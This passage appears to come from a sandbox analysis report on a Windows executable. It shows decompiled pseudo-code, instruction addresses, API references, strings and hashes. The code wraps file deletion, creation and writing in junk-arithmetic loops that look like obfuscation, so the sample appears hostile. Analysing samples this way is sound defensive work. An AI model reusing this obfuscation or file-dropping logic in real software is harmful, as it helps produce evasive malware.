                                                						}
                                                					}
                                                					_t279 =  *0x4fef18; // 0xbc3e19a
                                                					_t280 = _t279 - 0xac;
                                                					_t342 = _t280;
                                                					 *0x4fef40 = _t280;
                                                				}
                                                				E004F5234(_v80, _v36, _v68, _t342);
                                                				E00406CF4( &_v24, _v28);
                                                				_v52 = _v48 - 0x41;
                                                				_v56 = _v88 - _v72;
                                                				_t174 = E004FEF10; // 0x1cb931c0
                                                				 *0x4fef04 = _t174;
                                                				_v64 = _v80 + 4;
                                                				_t179 = CreateFileW(E004070B4(_v8), 0xc0000000, 3, 0, 1, 0x80, 0); // executed
                                                				_v100 = _t179;
                                                				_v92 = 0;
                                                				do {
                                                					_t311 = E004FEF50; // 0xa3b3f6c0
                                                					E004F5234(_v52, _v72, _t311, 0);
                                                					_t183 =  *0x4feee8; // 0xdcd0f434
                                                					E004FEF00 = _t183;
                                                					_t184 =  *0x4fef04; // 0x43c14963
                                                					 *0x4fef04 = E0040489C(_t184);
                                                					_t186 = E004FEF00; // 0xa3b3f6c0
                                                					_t344 = _t186 -  *0x4fef04; // 0x43c14963
                                                					if(_t344 <= 0) {
                                                						_t187 =  *0x4fef30; // 0xa1d816
                                                						__eflags = _t187 +  *0x4feeec -  *0x4feeec; // 0xb52124f2
                                                						if(__eflags > 0) {
                                                							__eflags = _v84 + 0x39 - _v36;
                                                							if(_v84 + 0x39 >= _v36) {
                                                								_t249 = _v36 + 0x6a;
                                                								__eflags = _t249;
                                                								_v116 = _t249;
                                                								asm("fild dword [ebp-0x70]");
                                                								_v60 = E004048CC();
                                                							} else {
                                                								_v56 = 0;
                                                								__eflags = _v56 - 0xa;
                                                								while(__eflags < 0) {
                                                									_v56 = _v56 + 1;
                                                									 *0x4fef14 = E004F0EBC(0x4fef4c, 0x4fef4c, __eflags);
                                                									__eflags = _v56 - 0xa;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_v68 = _v48;
                                                					}
                                                					_v116 = _v76 + 0xa2;
                                                					asm("fild dword [ebp-0x70]");
                                                					_v80 = E004048CC();
                                                					_t192 =  *0x4feed8; // 0x1cb9338e
                                                					_t345 = _t192 + 0xf8 -  *0x4fef44; // 0x38993
                                                					if(_t345 < 0) {
                                                						_push( &_v52);
                                                						_push( &_v96);
                                                						_push( &_v72);
                                                						 *0x4fef40 = E004F4700(0x4feef0, 0,  &_v68, 0x4fef44, _t345);
                                                					}
                                                					_v92 = _v92 + 1;
                                                				} while (_v92 != 0xd);
                                                				_t194 =  *0x4fef04; // 0x43c14963
                                                				 *0x4fef04 = E0040489C(_t194);
                                                				asm("fild dword [0x4feedc]");
                                                				E004FEF20 = E004048CC();
                                                				_t197 =  *0x4fef4c; // 0x43c1493c
                                                				 *0x4fef40 = _t197 + 0x50;
                                                				 *0x4feea0 =  *0x4fef48 * 0xb4;
                                                				_t200 = E004FEF34; // 0xc3c34ef0
                                                				 *0x4feeec = _t200 -  *0x4fef48;
                                                				if(_v100 != 0xffffffff) {
                                                					_v84 = 0;
                                                					while(_v84 < 0xa) {
                                                						_v84 = _v84 + 1;
                                                						_v92 = 0;
                                                						do {
                                                							_t236 =  *0x4fef24; // 0x0
                                                							_t316 =  *0x4feee4; // 0x0
                                                							E00407640(_t236, _t316);
                                                							if(0 != 0) {
                                                								_v52 = _v96;
                                                							} else {
                                                								E00406CF4( &_v24, L"NdrProxyForwardingFunction4");
                                                							}
                                                							_v92 = _v92 + 1;
                                                						} while (_v92 != 0x10);
                                                						_t351 = _v84 - 0xa;
                                                					}
                                                					_t210 =  *0x4fef04; // 0x43c14963
                                                					_push(_t210);
                                                					_t211 =  *0x4feea0; // 0xa1d900
                                                					_push(_t211);
                                                					_push(_v88);
                                                					_t303 =  *0x4fef28; // 0x3c79b5d4
                                                					E004F5954(_v60, 0, _t303, _v96, _t351);
                                                					_push(_v92);
                                                					_push(_v80);
                                                					_t217 =  *0x4fef4c; // 0x43c1493c
                                                					_push(_t217);
                                                					_t304 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef30 = E004F5954(_v76, 0, _t304, _v76, _t351);
                                                					_v80 = 0;
                                                					while(_v80 < 8) {
                                                						_v80 = _v80 + 1;
                                                						_v88 = 0;
                                                						while(_v88 < 0xe) {
                                                							_v88 = _v88 + 1;
                                                						}
                                                					}
                                                					_v64 = _v76 - _v44;
                                                					_v60 = 0;
                                                					while(_v60 < 6) {
                                                						_v60 = _v60 + 1;
                                                						_v72 = _v36 + 4;
                                                					}
                                                					_t228 = WriteFile(_v100, _v12, _v16,  &_v104, 0); // executed
                                                					asm("sbb eax, eax");
                                                					_v17 = _t228 + 1;
                                                					FindCloseChangeNotification(_v100); // executed
                                                				}
                                                				_pop(_t312);
                                                				 *[fs:eax] = _t312;
                                                				_push(E004F6D19);
                                                				E004069A8( &_v112);
                                                				E00406A08( &_v32, 3);
                                                				return E004069F0( &_v8);
                                                			}






































































                                                0x004f6852
                                                0x004f6855
                                                0x004f6858
                                                0x004f685b
                                                0x004f685e
                                                0x004f6861
                                                0x004f6864
                                                0x004f6867
                                                0x004f686d
                                                0x004f6874
                                                0x004f6875
                                                0x004f687a
                                                0x004f687d
                                                0x004f6886
                                                0x004f6889
                                                0x004f6893
                                                0x004f6898
                                                0x004f689d
                                                0x004f68a2
                                                0x004f68aa
                                                0x004f68b5
                                                0x004f68bf
                                                0x004f68c2
                                                0x004f68cc
                                                0x004f68dd
                                                0x004f68e3
                                                0x004f68e8
                                                0x004f68ed
                                                0x004f68f7
                                                0x004f68fc
                                                0x004f6904
                                                0x004f690f
                                                0x004f6918
                                                0x004f691b
                                                0x004f6920
                                                0x004f6927
                                                0x004f6931
                                                0x004f6931
                                                0x004f693b
                                                0x004f693d
                                                0x004f6945
                                                0x004f6945
                                                0x004f6951
                                                0x004f6959
                                                0x004f6960
                                                0x004f6962
                                                0x004f6965
                                                0x004f696a
                                                0x004f696f
                                                0x004f6974
                                                0x004f6979
                                                0x004f697e
                                                0x004f6984
                                                0x004f698c
                                                0x004f698c
                                                0x004f698f
                                                0x004f6995
                                                0x004f699a
                                                0x004f69a7
                                                0x004f69ba
                                                0x004f69c9
                                                0x004f69d3
                                                0x004f69bc
                                                0x004f69c4
                                                0x004f69c4
                                                0x004f69e6
                                                0x004f6a1c
                                                0x004f6a1c
                                                0x004f6a1f
                                                0x004f69e8
                                                0x004f69ea
                                                0x004f69f1
                                                0x004f69f3
                                                0x004f69f8
                                                0x004f69fb
                                                0x004f6a01
                                                0x004f6a06
                                                0x004f6a09
                                                0x004f6a0f
                                                0x004f69f1
                                                0x004f6a22
                                                0x004f6a27
                                                0x004f6a27
                                                0x004f6a2c
                                                0x004f6a2c
                                                0x004f6a3a
                                                0x004f6a45
                                                0x004f6a50
                                                0x004f6a59
                                                0x004f6a5c
                                                0x004f6a61
                                                0x004f6a6c
                                                0x004f6a8a
                                                0x004f6a90
                                                0x004f6a95
                                                0x004f6a98
                                                0x004f6a9b
                                                0x004f6aa4
                                                0x004f6aa9
                                                0x004f6aae
                                                0x004f6ab3
                                                0x004f6abd
                                                0x004f6ac2
                                                0x004f6ac7
                                                0x004f6acd
                                                0x004f6ad7
                                                0x004f6ae2
                                                0x004f6ae8
                                                0x004f6af0
                                                0x004f6af3
                                                0x004f6b22
                                                0x004f6b22
                                                0x004f6b25
                                                0x004f6b28
                                                0x004f6b30
                                                0x004f6af5
                                                0x004f6af7
                                                0x004f6afa
                                                0x004f6afe
                                                0x004f6b00
                                                0x004f6b12
                                                0x004f6b17
                                                0x004f6b17
                                                0x004f6afe
                                                0x004f6af3
                                                0x004f6acf
                                                0x004f6ad2
                                                0x004f6ad2
                                                0x004f6b3b
                                                0x004f6b3e
                                                0x004f6b46
                                                0x004f6b49
                                                0x004f6b53
                                                0x004f6b59
                                                0x004f6b5e
                                                0x004f6b62
                                                0x004f6b66
                                                0x004f6b79
                                                0x004f6b79
                                                0x004f6b7e
                                                0x004f6b81
                                                0x004f6b8b
                                                0x004f6b95
                                                0x004f6b9a
                                                0x004f6ba5
                                                0x004f6baa
                                                0x004f6bb2
                                                0x004f6bc1
                                                0x004f6bc6
                                                0x004f6bd1
                                                0x004f6bda
                                                0x004f6be2
                                                0x004f6be9
                                                0x004f6beb
                                                0x004f6bf0
                                                0x004f6bf3
                                                0x004f6bf3
                                                0x004f6bf8
                                                0x004f6bfe
                                                0x004f6c03
                                                0x004f6c17
                                                0x004f6c05
                                                0x004f6c0d
                                                0x004f6c0d
                                                0x004f6c1a
                                                0x004f6c1d
                                                0x004f6c23
                                                0x004f6c23
                                                0x004f6c29
                                                0x004f6c2e
                                                0x004f6c2f
                                                0x004f6c34
                                                0x004f6c38
                                                0x004f6c39
                                                0x004f6c45
                                                0x004f6c4d
                                                0x004f6c51
                                                0x004f6c52
                                                0x004f6c57
                                                0x004f6c58
                                                0x004f6c69
                                                0x004f6c70
                                                0x004f6c77
                                                0x004f6c79
                                                0x004f6c7e
                                                0x004f6c85
                                                0x004f6c87
                                                0x004f6c8a
                                                0x004f6c90
                                                0x004f6c9c
                                                0x004f6ca1
                                                0x004f6ca8
                                                0x004f6caa
                                                0x004f6cb3
                                                0x004f6cb6
                                                0x004f6cce
                                                0x004f6cd7
                                                0x004f6cda
                                                0x004f6ce1
                                                0x004f6ce1
                                                0x004f6ce9
                                                0x004f6cec
                                                0x004f6cef
                                                0x004f6cf7
                                                0x004f6d04
                                                0x004f6d11

                                                APIs
                                                  • Part of subcall function 00406AAC: SysAllocStringLen.OLEAUT32(004F9861,54EB1089), ref: 00406ABA
                                                  • Part of subcall function 00414964: GetFileAttributesW.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 00414975
                                                • DeleteFileW.KERNEL32(00000000,00000000,004F6D12), ref: 004F6951
                                                • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000001,00000080,00000000,00000000,004F6D12), ref: 004F6A8A
                                                Strings
                                                • NdrProxyForwardingFunction4, xrefs: 004F6C08
                                                • GetNamedPipeClientSessionId, xrefs: 004F69A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocAttributesCreateDeleteString
                                                • String ID: GetNamedPipeClientSessionId$NdrProxyForwardingFunction4
                                                • API String ID: 884470057-2457481811
                                                • Opcode ID: c321f479e29d5d881d0874c9e3ef6ce8a45d4fb24531ad4a078b8a4ea2aa142b
                                                • Instruction ID: b04cf053d614f00921ad11d5840789a9434d6e558864355ebcc84eb55fc39168
                                                • Opcode Fuzzy Hash: c321f479e29d5d881d0874c9e3ef6ce8a45d4fb24531ad4a078b8a4ea2aa142b
                                                • Instruction Fuzzy Hash: 5EF1E2B0D00248DFCB00DFAAE985AADBBF5FB08305F11853AE605E7265D738A955CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414964(void* __eax, void* __edx) {
                                                				signed char _t14;
                                                				void* _t21;
                                                				void* _t28;
                                                				long _t29;
                                                				WCHAR* _t32;
                                                				void* _t33;
                                                
                                                				_t28 = __edx;
                                                				_t33 = __eax;
                                                				_t32 = E00407330(__eax);
                                                				_t14 = GetFileAttributesW(_t32); // executed
                                                				if(_t14 == 0xffffffff) {
                                                					_t29 = GetLastError();
                                                					if(_t29 == 2 || _t29 == 3 || _t29 == 0x7b || E00414924(_t33) == 0) {
                                                						return 0;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				if((_t14 & 0x00000004) == 0) {
                                                					return _t14 & 0xffffff00 | (_t14 & 0x00000010) == 0x00000000;
                                                				}
                                                				if(_t28 != 0) {
                                                					if((_t14 & 0x00000010) == 0) {
                                                						_t21 = CreateFileW(_t32, 0x80000000, 1, 0, 3, 0, 0);
                                                						if(_t21 == 0xffffffff) {
                                                							return GetLastError() & 0xffffff00 | _t22 == 0x00000020;
                                                						}
                                                						CloseHandle(_t21);
                                                						return 1;
                                                					}
                                                					return 0;
                                                				}
                                                				return 1;
                                                			}









                                                0x00414967
                                                0x00414969
                                                0x00414972
                                                0x00414975
                                                0x0041497d
                                                0x004149d3
                                                0x004149d8
                                                0x00000000
                                                0x004149f3
                                                0x00000000
                                                0x004149f3
                                                0x004149d8
                                                0x00414982
                                                0x00000000
                                                0x004149c9
                                                0x00414986
                                                0x0041498e
                                                0x004149a4
                                                0x004149ac
                                                0x00000000
                                                0x004149c2
                                                0x004149af
                                                0x00000000
                                                0x004149b4
                                                0x00000000
                                                0x00414990
                                                0x00000000

                                                APIs
                                                • GetFileAttributesW.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 00414975
                                                • GetLastError.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 004149CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 1799206407-0
                                                • Opcode ID: 229930fbf8ebe544eeadf5f9bbc2de16a83e9f774fc1dc3c6833d551b3d58c8d
                                                • Instruction ID: 25158c1bd2398d777e934e9cff4b07ce8652424a53ff7617a99fafd84f24faa1
                                                • Opcode Fuzzy Hash: 229930fbf8ebe544eeadf5f9bbc2de16a83e9f774fc1dc3c6833d551b3d58c8d
                                                • Instruction Fuzzy Hash: 62011AB527424025E935207D4C867FB06498BCA7A8F280627FA61A62D2D66E49C361BE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E004F4258(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                				intOrPtr* _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				intOrPtr _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				intOrPtr _v88;
                                                				signed int _v92;
                                                				intOrPtr _v96;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v108;
                                                				intOrPtr _v112;
                                                				intOrPtr _v116;
                                                				intOrPtr _v120;
                                                				short _v640;
                                                				intOrPtr _v644;
                                                				char _v648;
                                                				signed int _t159;
                                                				signed int _t161;
                                                				intOrPtr _t162;
                                                				signed int _t181;
                                                				signed int _t190;
                                                				intOrPtr _t193;
                                                				intOrPtr _t194;
                                                				signed int _t197;
                                                				signed int _t204;
                                                				signed int _t212;
                                                				intOrPtr _t218;
                                                				intOrPtr _t222;
                                                				intOrPtr _t223;
                                                				signed int _t229;
                                                				signed int _t230;
                                                				signed int _t232;
                                                				intOrPtr _t234;
                                                				signed int _t235;
                                                				intOrPtr _t257;
                                                				intOrPtr _t259;
                                                				signed int _t261;
                                                				signed int _t262;
                                                				intOrPtr _t278;
                                                				intOrPtr _t279;
                                                				intOrPtr _t287;
                                                				void* _t291;
                                                				void* _t292;
                                                				intOrPtr _t293;
                                                				void* _t295;
                                                				void* _t308;
                                                				void* _t309;
                                                				void* _t313;
                                                				void* _t316;
                                                				void* _t322;
                                                
                                                				_t289 = __esi;
                                                				_t288 = __edi;
                                                				_t267 = __ebx;
                                                				_t291 = _t292;
                                                				_t293 = _t292 + 0xfffffd7c;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v648 = 0;
                                                				_v12 = 0;
                                                				_v16 = 0;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v8 = __eax;
                                                				_push(_t291);
                                                				_push(0x4f46b4);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t293;
                                                				_push(_t291);
                                                				_push(0x4f4684);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t293;
                                                				_v76 = _v96 + 0xa3;
                                                				_v84 = _v68 + _v92;
                                                				_v108 = _v88 - _v44;
                                                				_v100 = 0;
                                                				while(_v100 < 7) {
                                                					_v100 = _v100 + 1;
                                                					_t259 =  *0x4fef4c; // 0x43c1493c
                                                					 *0x4fef4c = E0040489C(_t259);
                                                					_t261 = E004FEF20; // 0x6e687a1a
                                                					E004FEF50 = _t261;
                                                					_t262 = E004FEF50; // 0xa3b3f6c0
                                                					_t295 = _t262 -  *0x4fef4c; // 0x43c1493c
                                                					if(_t295 > 0) {
                                                						_v36 = _v104 - _v72;
                                                					}
                                                					_v52 = 0;
                                                					do {
                                                						asm("fild dword [ebp-0x6c]");
                                                						_v60 = E004048CC();
                                                						_v52 = _v52 + 1;
                                                					} while (_v52 != 0xf);
                                                				}
                                                				_v28 = 0;
                                                				if(_v28 < 0xb) {
                                                					_v28 = _v28 + 1;
                                                					if(_v96 <= _v56) {
                                                						 *0x4fef14 = 0x5c -  *0x4feeec;
                                                					} else {
                                                						_v48 = 0;
                                                						while(_v48 < 0xd) {
                                                							_v48 = _v48 + 1;
                                                							_t257 =  *0x4feecc; // 0xd26bafe0
                                                							 *0x4feecc = E0040489C(_t257);
                                                						}
                                                					}
                                                				}
                                                				 *0x4feea0 = E004FEF2C * 0x57;
                                                				E00406B60(_v8, GetWindowsDirectoryW( &_v640, 0x104),  &_v640);
                                                				_t159 =  *0x4feed8; // 0x1cb9338e
                                                				E004FEF0C = _t159;
                                                				_v72 = 0;
                                                				while(_v72 < 0xf) {
                                                					_v72 = _v72 + 1;
                                                					_v80 = _v64 - 0xea;
                                                					_v644 = _v108 + 0xf1;
                                                					asm("fild dword [ebp-0x280]");
                                                					_v88 = E004048CC();
                                                					_v96 = _v40;
                                                					_v644 = _v100 + 4;
                                                					asm("fild dword [ebp-0x280]");
                                                					_v92 = E004048D8();
                                                				}
                                                				_t161 = E004FEF34; // 0xc3c34ef0
                                                				E004FEED0 = _t161;
                                                				_t162 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4feed8 = _t162;
                                                				_v60 = _v28 - 0x52;
                                                				asm("fild dword [ebp-0x6c]");
                                                				_v32 = E004048CC();
                                                				E00407284( *_v8, 0);
                                                				if(0 != 0) {
                                                					_v100 = 0;
                                                					while(_v100 < 0xa) {
                                                						_v100 = _v100 + 1;
                                                						_t229 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF50 = _t229;
                                                						_t230 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feea0 = E0040489C(_t230);
                                                						_t232 =  *0x4feea0; // 0xa1d900
                                                						_t308 = _t232 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t308 <= 0) {
                                                							_t234 = _v108 + 0x3f;
                                                							__eflags = _t234;
                                                							_v56 = _t234;
                                                						} else {
                                                							_push(_v108);
                                                							_t287 =  *0x4feecc; // 0xd26bafe0
                                                							_v76 = E004EE798(_v104, _t267, _v56, _t287, _t308);
                                                						}
                                                						_t235 =  *0x4fef30; // 0xa1d816
                                                						_t309 = _t235 + E004FEF10 - E004FEF10; // 0x1cb931c0
                                                						if(_t309 == 0) {
                                                							_v80 = _v88 - _v48;
                                                						}
                                                						_v92 = _v64 * _v68;
                                                					}
                                                					_v72 = _v32 + _v28;
                                                					asm("fild dword [ebp-0x28]");
                                                					_v84 = E004048D8();
                                                					 *0x4fef14 = 0x65 -  *0x4fef04;
                                                					_t181 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef3c = _t181 *  *0x4fef30;
                                                					_v96 = _v60 + _v52;
                                                					E004F37A4( *_v8, _t267,  &_v648, _t288, _t289); // executed
                                                					E0040713C(_v8, 0x4f46c8, _v648);
                                                					_t190 =  *0x4feedc; // 0xbc3e19a
                                                					 *0x4fef14 = _t190;
                                                					_v76 = 0;
                                                					if(_v76 < 0xf) {
                                                						_v76 = _v76 + 1;
                                                						_v84 = _v52 - _v48;
                                                						_t218 =  *0x4fef4c; // 0x43c1493c
                                                						_t313 = _t218 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                						if(_t313 == 0) {
                                                							_v100 = 0;
                                                							while(_v100 < 7) {
                                                								_v100 = _v100 + 1;
                                                								E00406CF4( &_v12, L"NtSetDefaultLocale");
                                                							}
                                                						}
                                                						E00406CF4( &_v16, _v20);
                                                						_t222 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4feefc = _t222;
                                                						_t223 =  *0x4feefc; // 0x4b08dcc7
                                                						_t316 = _t223 -  *0x4fef14; // 0xb52124ca
                                                						if(_t316 > 0) {
                                                							_v68 = _v104 + 0x1e;
                                                						}
                                                					}
                                                					_v96 = 0;
                                                					while(_v96 < 5) {
                                                						_v96 = _v96 + 1;
                                                						_v112 = 0;
                                                						_v116 = _v12;
                                                						if(_v116 != 0) {
                                                							_v116 =  *((intOrPtr*)(_v116 - 4));
                                                						}
                                                						if(_v116 == 0x2a) {
                                                							_t212 = E004FEF0C; // 0xb52124bf
                                                							 *0x4feed8 = _t212;
                                                						}
                                                					}
                                                					_t193 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4feefc = _t193;
                                                					_t194 =  *0x4feefc; // 0x4b08dcc7
                                                					_t322 = _t194 -  *0x4fef14; // 0xb52124ca
                                                					if(_t322 <= 0) {
                                                						__eflags = 0x45;
                                                						_v88 = 0x45 - _v60;
                                                						_t197 = E004FEF38; // 0xc3c34fdc
                                                						E004FEF38 = E0040489C(_t197);
                                                					} else {
                                                						_v80 = 0x48 - _v92;
                                                					}
                                                					_v120 = _v16;
                                                					if(_v120 != 0) {
                                                						_v120 =  *((intOrPtr*)(_v120 - 4));
                                                					}
                                                					if(_v120 <= 0x22) {
                                                						asm("fild dword [0x4feef0]");
                                                						 *0x4fef28 = E004048D8();
                                                					} else {
                                                						_v108 = 0;
                                                						do {
                                                							_t204 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feea0 = _t204;
                                                							_v108 = _v108 + 1;
                                                						} while (_v108 != 1);
                                                					}
                                                					 *0x4feea0 = 4 -  *0x4feeec;
                                                				}
                                                				_pop(_t278);
                                                				 *[fs:eax] = _t278;
                                                				_pop(_t279);
                                                				 *[fs:eax] = _t279;
                                                				_push(E004F46BB);
                                                				E004069F0( &_v648);
                                                				return E00406A08( &_v24, 4);
                                                			}





































































                                                0x004f4258
                                                0x004f4258
                                                0x004f4258
                                                0x004f4259
                                                0x004f425b
                                                0x004f4261
                                                0x004f4262
                                                0x004f4263
                                                0x004f4266
                                                0x004f426c
                                                0x004f426f
                                                0x004f4272
                                                0x004f4275
                                                0x004f4278
                                                0x004f427d
                                                0x004f427e
                                                0x004f4283
                                                0x004f4286
                                                0x004f428b
                                                0x004f428c
                                                0x004f4291
                                                0x004f4294
                                                0x004f429f
                                                0x004f42a8
                                                0x004f42b1
                                                0x004f42b6
                                                0x004f42bd
                                                0x004f42bf
                                                0x004f42c2
                                                0x004f42cc
                                                0x004f42d1
                                                0x004f42d6
                                                0x004f42db
                                                0x004f42e0
                                                0x004f42e6
                                                0x004f42ee
                                                0x004f42ee
                                                0x004f42f3
                                                0x004f42f6
                                                0x004f42f6
                                                0x004f42fe
                                                0x004f4301
                                                0x004f4304
                                                0x004f430a
                                                0x004f4312
                                                0x004f4319
                                                0x004f431b
                                                0x004f4324
                                                0x004f4356
                                                0x004f4326
                                                0x004f4328
                                                0x004f432f
                                                0x004f4331
                                                0x004f4334
                                                0x004f433e
                                                0x004f4343
                                                0x004f432f
                                                0x004f4324
                                                0x004f436a
                                                0x004f438c
                                                0x004f4391
                                                0x004f4396
                                                0x004f439d
                                                0x004f43a4
                                                0x004f43a6
                                                0x004f43b1
                                                0x004f43bc
                                                0x004f43c2
                                                0x004f43cd
                                                0x004f43d3
                                                0x004f43dc
                                                0x004f43e2
                                                0x004f43ed
                                                0x004f43f0
                                                0x004f43f6
                                                0x004f43fb
                                                0x004f4400
                                                0x004f4405
                                                0x004f4410
                                                0x004f4413
                                                0x004f441b
                                                0x004f4425
                                                0x004f442a
                                                0x004f4432
                                                0x004f4439
                                                0x004f443b
                                                0x004f443e
                                                0x004f4443
                                                0x004f4448
                                                0x004f4452
                                                0x004f4457
                                                0x004f445c
                                                0x004f4462
                                                0x004f4481
                                                0x004f4481
                                                0x004f4484
                                                0x004f4464
                                                0x004f4467
                                                0x004f446b
                                                0x004f4479
                                                0x004f4479
                                                0x004f4487
                                                0x004f4492
                                                0x004f4498
                                                0x004f44a0
                                                0x004f44a0
                                                0x004f44a9
                                                0x004f44ac
                                                0x004f44b8
                                                0x004f44bb
                                                0x004f44c3
                                                0x004f44d1
                                                0x004f44d6
                                                0x004f44e1
                                                0x004f44ec
                                                0x004f44fa
                                                0x004f450d
                                                0x004f4512
                                                0x004f4517
                                                0x004f451e
                                                0x004f4525
                                                0x004f4527
                                                0x004f4530
                                                0x004f4533
                                                0x004f453e
                                                0x004f4544
                                                0x004f4548
                                                0x004f454f
                                                0x004f4551
                                                0x004f455c
                                                0x004f4561
                                                0x004f454f
                                                0x004f456d
                                                0x004f4572
                                                0x004f4577
                                                0x004f457c
                                                0x004f4581
                                                0x004f4587
                                                0x004f458f
                                                0x004f458f
                                                0x004f4587
                                                0x004f459c
                                                0x004f45a3
                                                0x004f45a5
                                                0x004f45aa
                                                0x004f45b0
                                                0x004f45b7
                                                0x004f45c1
                                                0x004f45c1
                                                0x004f45c8
                                                0x004f45ca
                                                0x004f45cf
                                                0x004f45cf
                                                0x004f45df
                                                0x004f45e5
                                                0x004f45ea
                                                0x004f45ef
                                                0x004f45f4
                                                0x004f45fa
                                                0x004f460e
                                                0x004f4611
                                                0x004f4614
                                                0x004f461e
                                                0x004f45fc
                                                0x004f4604
                                                0x004f4604
                                                0x004f4626
                                                0x004f462d
                                                0x004f4637
                                                0x004f4637
                                                0x004f463e
                                                0x004f465a
                                                0x004f4665
                                                0x004f4640
                                                0x004f4642
                                                0x004f4645
                                                0x004f4645
                                                0x004f464a
                                                0x004f464f
                                                0x004f4652
                                                0x004f4658
                                                0x004f4675
                                                0x004f4675
                                                0x004f467c
                                                0x004f467f
                                                0x004f4690
                                                0x004f4693
                                                0x004f4696
                                                0x004f46a1
                                                0x004f46b3

                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004F4684,?,00000000,004F46B4,?,?,?,00000000,?,004F4A42,00000000,004F4F22), ref: 004F437B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: DirectoryWindows
                                                • String ID: "$*$NtSetDefaultLocale
                                                • API String ID: 3619848164-1193084605
                                                • Opcode ID: 02fb8d28a59304ce8f44ee0d808acca0a28d084546408091dd7a04d92bc53992
                                                • Instruction ID: 38cd9ab25aa669de575b05808a85b99e05ef41cf5b016bf71ca6ee26c3c3f45a
                                                • Opcode Fuzzy Hash: 02fb8d28a59304ce8f44ee0d808acca0a28d084546408091dd7a04d92bc53992
                                                • Instruction Fuzzy Hash: E7E1F1B4D00259DFDB50DFAAE9849AEBBF1FB48305F10843AE504E7221DB389951CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004067A4() {
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr _t31;
                                                				void* _t46;
                                                				struct HINSTANCE__* _t49;
                                                				void* _t57;
                                                
                                                				if( *0x4fd004 != 0) {
                                                					E00406684();
                                                					E0040670C(_t46);
                                                					 *0x4fd004 = 0;
                                                				}
                                                				if( *0x502bc8 != 0 && GetCurrentThreadId() ==  *0x502bf0) {
                                                					E004063DC(0x502bc4);
                                                					E004066E0(0x502bc4);
                                                				}
                                                				if( *0x00502BBC != 0 ||  *0x500050 == 0) {
                                                					L8:
                                                					if( *((char*)(0x502bbc)) == 2 &&  *0x4fd000 == 0) {
                                                						 *0x00502BA0 = 0;
                                                					}
                                                					if( *((char*)(0x502bbc)) != 0) {
                                                						L14:
                                                						E00406404();
                                                						if( *((char*)(0x502bbc)) <= 1 ||  *0x4fd000 != 0) {
                                                							_t15 =  *0x00502BA4;
                                                							if( *0x00502BA4 != 0) {
                                                								E00409A70(_t15);
                                                								_t31 =  *((intOrPtr*)(0x502ba4));
                                                								_t8 = _t31 + 0x10; // 0x400000
                                                								_t49 =  *_t8;
                                                								_t9 = _t31 + 4; // 0x400000
                                                								if(_t49 !=  *_t9 && _t49 != 0) {
                                                									FreeLibrary(_t49);
                                                								}
                                                							}
                                                						}
                                                						E004063DC(0x502b94);
                                                						if( *((char*)(0x502bbc)) == 1) {
                                                							 *0x00502BB8();
                                                						}
                                                						if( *((char*)(0x502bbc)) != 0) {
                                                							E004066E0(0x502b94);
                                                						}
                                                						if( *0x502b94 == 0) {
                                                							if( *0x500034 != 0) {
                                                								 *0x500034();
                                                							}
                                                							ExitProcess( *0x4fd000); // executed
                                                						}
                                                						memcpy(0x502b94,  *0x502b94, 0xc << 2);
                                                						_t57 = _t57 + 0xc;
                                                						0x4fd000 = 0x4fd000;
                                                						0x502b94 = 0x502b94;
